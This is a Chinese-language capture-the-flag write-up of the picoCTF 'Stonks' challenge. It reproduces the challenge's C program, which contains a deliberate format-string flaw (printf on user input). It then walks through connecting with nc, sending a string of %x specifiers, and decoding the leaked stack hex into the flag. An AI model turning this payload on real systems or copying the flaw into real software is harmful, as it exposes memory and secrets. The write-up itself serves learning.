首先,先看看題目給我們的程式
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <time.h>
#define FLAG_BUFFER 128
#define MAX_SYM_LEN 4
typedef struct Stonks {
int shares;
char symbol[MAX_SYM_LEN + 1];
struct Stonks *next;
} Stonk;
typedef struct Portfolios {
int money;
Stonk *head;
} Portfolio;
int view_portfolio(Portfolio *p) {
if (!p) {
return 1;
}
printf("\nPortfolio as of ");
fflush(stdout);
system("date"); // TODO: implement this in C
fflush(stdout);
printf("\n\n");
Stonk *head = p->head;
if (!head) {
printf("You don't own any stonks!\n");
}
while (head) {
printf("%d shares of %s\n", head->shares, head->symbol);
head = head->next;
}
return 0;
}
Stonk *pick_symbol_with_AI(int shares) {
if (shares < 1) {
return NULL;
}
Stonk *stonk = malloc(sizeof(Stonk));
stonk->shares = shares;
int AI_symbol_len = (rand() % MAX_SYM_LEN) + 1;
for (int i = 0; i <= MAX_SYM_LEN; i++) {
if (i < AI_symbol_len) {
stonk->symbol[i] = 'A' + (rand() % 26);
} else {
stonk->symbol[i] = '\0';
}
}
stonk->next = NULL;
return stonk;
}
int buy_stonks(Portfolio *p) {
if (!p) {
return 1;
}
char api_buf[FLAG_BUFFER];
FILE *f = fopen("api","r");
if (!f) {
printf("Flag file not found. Contact an admin.\n");
exit(1);
}
fgets(api_buf, FLAG_BUFFER, f);
int money = p->money;
int shares = 0;
Stonk *temp = NULL;
printf("Using patented AI algorithms to buy stonks\n");
while (money > 0) {
shares = (rand() % money) + 1;
temp = pick_symbol_with_AI(shares);
temp->next = p->head;
p->head = temp;
money -= shares;
}
printf("Stonks chosen\n");
// TODO: Figure out how to read token from file, for now just ask
char *user_buf = malloc(300 + 1);
printf("What is your API token?\n");
scanf("%300s", user_buf);
printf("Buying stonks with token:\n");
printf(user_buf);
// TODO: Actually use key to interact with API
view_portfolio(p);
return 0;
}
Portfolio *initialize_portfolio() {
Portfolio *p = malloc(sizeof(Portfolio));
p->money = (rand() % 2018) + 1;
p->head = NULL;
return p;
}
void free_portfolio(Portfolio *p) {
Stonk *current = p->head;
Stonk *next = NULL;
while (current) {
next = current->next;
free(current);
current = next;
}
free(p);
}
int main(int argc, char *argv[])
{
setbuf(stdout, NULL);
srand(time(NULL));
Portfolio *p = initialize_portfolio();
if (!p) {
printf("Memory failure\n");
exit(1);
}
int resp = 0;
printf("Welcome back to the trading app!\n\n");
printf("What would you like to do?\n");
printf("1) Buy some stonks!\n");
printf("2) View my portfolio\n");
scanf("%d", &resp);
if (resp == 1) {
buy_stonks(p);
} else if (resp == 2) {
view_portfolio(p);
}
free_portfolio(p);
printf("Goodbye!\n");
exit(0);
}
我們發現了一個格式字符串漏洞,在第93行附近,但是沒有任何引號包圍格式字符串,因此可以通過指定格式字符串來訪問堆疊上的數據。
然後我們就輸入題目給我們的指令
$ nc mercury.picoctf.net 20195
然後它會給我們兩個選項
What would you like to do?
1) Buy some stonks!
2) View my portfolio
當然是選第一個啦~
之後會叫我們輸入我們的api key
我是輸入這樣
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
然後它就會吐出一堆數字
83b5370804b00080489c3f7f56d80ffffffff183b3160f7f64110f7f56dc7083b4180183b535083b53706f6369707b465443306c5f49345f74356d5f6c6c306d5f795f79336e3534303664303664ffe2007df7f91af8f7f6444095ce120010f7df3ce9f7f650c0f7f565c0f7f56000ffe28588f7de468df7f565c08048ecaffe285940f7f78f09804b000f7f56000f7f56e20ffe285c8
這邊看起來,有點像16進位的樣子
我們把它丟進去這邊看看
會找到這個有點顯眼的東西
ocip{FTC0l_I4_t5m_ll0m_y_y3n5406d06dÿâ
這不就是Flag嗎?!
但是它看起來亂掉了,看起來是四個四個顛倒順序的樣子
這時候我們只要把他們弄正,就可以得到Flag啦~
然後說一下,接下來可能就是沒有特定順序
把想要補的題目補完
或者是想要記一下學到了什麼
iThome鐵人賽
看影片追技術